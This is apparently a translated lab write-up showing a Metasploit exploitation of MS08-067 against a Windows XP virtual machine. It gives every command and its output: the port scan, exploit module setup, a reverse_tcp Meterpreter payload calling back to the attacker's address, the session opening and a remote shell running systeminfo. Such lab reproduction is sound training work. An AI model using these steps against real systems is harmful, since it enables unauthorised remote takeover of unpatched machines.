MS08-067 vulnerability

tags: ms  MS08-067 vulnerability  MS vulnerability series  Security hole

MS08-067 vulnerability

lab environment

1.kali linux(ip:192.168.131.131)

2.windows xp (ip:192.168.131.134)

Port detection

nmap 192.168.131.134

root@kali:~# nmap 192.168.131.134
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 14:17 CST
Nmap scan report for 192.168.131.134
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B1:96:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds

It is found that high-risk ports such as 445 and 3389 are open;

Vulnerability

1. Open the MSF tool Search MS08-067; (Search 08-067)

[i] Database already started
[i] The database appears to be already configured, skipping initialization
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search 08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > 

 

2. Discover there is an available exp (command: use expel / windows / smb / ms08_067_netapi)

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(windows/smb/ms08_067_netapi) >

3. View the configuration required for Exp (command: show options)

msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) > 

4. Set the target host; (Command: set rhost 192.168.131.134)

msf exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.131.134
rhost => 192.168.131.134
msf exploit(windows/smb/ms08_067_netapi) >

5. Set a PayLoad (Windows usually used PayLoad: Windows / meterpreter / reverse_tcp) (Command: set payage windows / meterpreter / reverse_tcp)

set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > 

6. Review the configuration you need for PayLoad (command: show options)

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.131.134  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

7. Find a local IP (command: set lhost 192.168.131.131)

msf exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.131.131
lhost => 192.168.131.131
msf exploit(windows/smb/ms08_067_netapi) > 

8. If you cannot determine the target host operating system (you can not set the target, this is not set, using the default configuration)

9. Start attack (command: Exploit)

msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.131.131:4444 
[*] 192.168.131.134:445 - Automatically detecting the target...
[*] 192.168.131.134:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.131.134:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.131.134:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.131.134
[*] Meterpreter session 1 opened (192.168.131.131:4444 -> 192.168.131.134:1040) at 2020-09-10 14:25:53 +0800

meterpreter > 

10. Get the shell to view host information (shell, systeminfo)

meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 Z-64EC8C23799B4
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          Z Y H
Registered Organization:   
Product ID:                76487-011-0652134-22807
Original Install Date:     8/25/2020, 11:09:41 AM
System Up Time:            0 Days, 0 Hours, 30 Minutes, 29 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 142 Stepping 10 GenuineIntel ~1992 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     511 MB
Available Physical Memory: 350 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,004 MB
Virtual Memory: In Use:    44 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.131.254
                                 IP address(es)
                                 [01]: 192.168.131.134

C:\WINDOWS\system32>

Successfully got shell;

Intelligent Recommendation

MS08-067 vulnerability remote overflow intrusion test

The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, t...

#windowsxpsp3 system MS08-067 vulnerability test

#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...

MS08-067 vulnerability penetration attack process

lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...

[Vulnerability recurrence] MS08-067 classic remote overflow vulnerability recurrence

ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...

MS08-067 Remote Overflow Vulnerability (CVE-2008-4250)

MS08-067 Remote Overflow Vulnerability   Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...

More Recommendation

Using ms08-067 vulnerability to remotely control Windows XP

1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...

The process of using metasploit (MSF) to exploit the ms08-067 vulnerability of windows

0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...

Windows XP SP3 (MS08-067 Vulnerability Revision and Utilization)

Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...

Windows XP SP2 (MS08-067 vulnerability reappearance and utilization)

MS08-067 Vulnerability: It is a vulnerability in a remote process call (RPC) service. When calling the NetPathCanonicalize function in the SMB channel, the vulnerability is triggered, causing the use ...

MS08-067 (CVE-2008-4250) Remote command execution vulnerability

Articles directory Foreword Introduction Second, influence Third, vulnerability harm Fourth, local reproduction Five, patch number 6. Windows Server 2003 SP2 Chinese version Utilization method 7. Deep...

Copyright  DMCA © 2018-2026 - All Rights Reserved - www.programmersought.com  User Notice

Top